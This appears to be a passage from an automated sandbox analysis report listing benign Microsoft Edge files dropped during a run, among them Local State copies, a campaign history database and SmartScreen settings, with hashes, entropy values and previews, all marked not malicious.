                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36cf4.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.090756405094512
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMkwuF9hDO6vP6O+ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEC6stbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:D663CE705C38B77B5378E567292A85D9
                                                                                                                                                                                                                                                                                                                                SHA1:1705CCB0A7D2CAD052763B481CC4711D36A96AF6
                                                                                                                                                                                                                                                                                                                                SHA-256:BBFECD8C8F25F1792CA86588D9550C48B7559219A6E5D6BA5D6EEFE173B078E3
                                                                                                                                                                                                                                                                                                                                SHA-512:A31D7861BC8FF94737D2DED87060921FDF1ABE7F77FF0E03A871B4FDF96AD8F38B96088A133EC886E0C7985C5ED9F6F7B6CD0A9119EF7BE516E382ACAFA04EB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36e1c.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.090756405094512
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMkwuF9hDO6vP6O+ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEC6stbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:D663CE705C38B77B5378E567292A85D9
                                                                                                                                                                                                                                                                                                                                SHA1:1705CCB0A7D2CAD052763B481CC4711D36A96AF6
                                                                                                                                                                                                                                                                                                                                SHA-256:BBFECD8C8F25F1792CA86588D9550C48B7559219A6E5D6BA5D6EEFE173B078E3
                                                                                                                                                                                                                                                                                                                                SHA-512:A31D7861BC8FF94737D2DED87060921FDF1ABE7F77FF0E03A871B4FDF96AD8F38B96088A133EC886E0C7985C5ED9F6F7B6CD0A9119EF7BE516E382ACAFA04EB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF394bf.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.090756405094512
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMkwuF9hDO6vP6O+ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEC6stbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:D663CE705C38B77B5378E567292A85D9
                                                                                                                                                                                                                                                                                                                                SHA1:1705CCB0A7D2CAD052763B481CC4711D36A96AF6
                                                                                                                                                                                                                                                                                                                                SHA-256:BBFECD8C8F25F1792CA86588D9550C48B7559219A6E5D6BA5D6EEFE173B078E3
                                                                                                                                                                                                                                                                                                                                SHA-512:A31D7861BC8FF94737D2DED87060921FDF1ABE7F77FF0E03A871B4FDF96AD8F38B96088A133EC886E0C7985C5ED9F6F7B6CD0A9119EF7BE516E382ACAFA04EB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF40ef0.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.090756405094512
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMkwuF9hDO6vP6O+ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEC6stbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:D663CE705C38B77B5378E567292A85D9
                                                                                                                                                                                                                                                                                                                                SHA1:1705CCB0A7D2CAD052763B481CC4711D36A96AF6
                                                                                                                                                                                                                                                                                                                                SHA-256:BBFECD8C8F25F1792CA86588D9550C48B7559219A6E5D6BA5D6EEFE173B078E3
                                                                                                                                                                                                                                                                                                                                SHA-512:A31D7861BC8FF94737D2DED87060921FDF1ABE7F77FF0E03A871B4FDF96AD8F38B96088A133EC886E0C7985C5ED9F6F7B6CD0A9119EF7BE516E382ACAFA04EB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF47f0f.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.090756405094512
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMkwuF9hDO6vP6O+ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEC6stbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:D663CE705C38B77B5378E567292A85D9
                                                                                                                                                                                                                                                                                                                                SHA1:1705CCB0A7D2CAD052763B481CC4711D36A96AF6
                                                                                                                                                                                                                                                                                                                                SHA-256:BBFECD8C8F25F1792CA86588D9550C48B7559219A6E5D6BA5D6EEFE173B078E3
                                                                                                                                                                                                                                                                                                                                SHA-512:A31D7861BC8FF94737D2DED87060921FDF1ABE7F77FF0E03A871B4FDF96AD8F38B96088A133EC886E0C7985C5ED9F6F7B6CD0A9119EF7BE516E382ACAFA04EB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4d9e1.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.090756405094512
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMkwuF9hDO6vP6O+ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEC6stbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:D663CE705C38B77B5378E567292A85D9
                                                                                                                                                                                                                                                                                                                                SHA1:1705CCB0A7D2CAD052763B481CC4711D36A96AF6
                                                                                                                                                                                                                                                                                                                                SHA-256:BBFECD8C8F25F1792CA86588D9550C48B7559219A6E5D6BA5D6EEFE173B078E3
                                                                                                                                                                                                                                                                                                                                SHA-512:A31D7861BC8FF94737D2DED87060921FDF1ABE7F77FF0E03A871B4FDF96AD8F38B96088A133EC886E0C7985C5ED9F6F7B6CD0A9119EF7BE516E382ACAFA04EB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
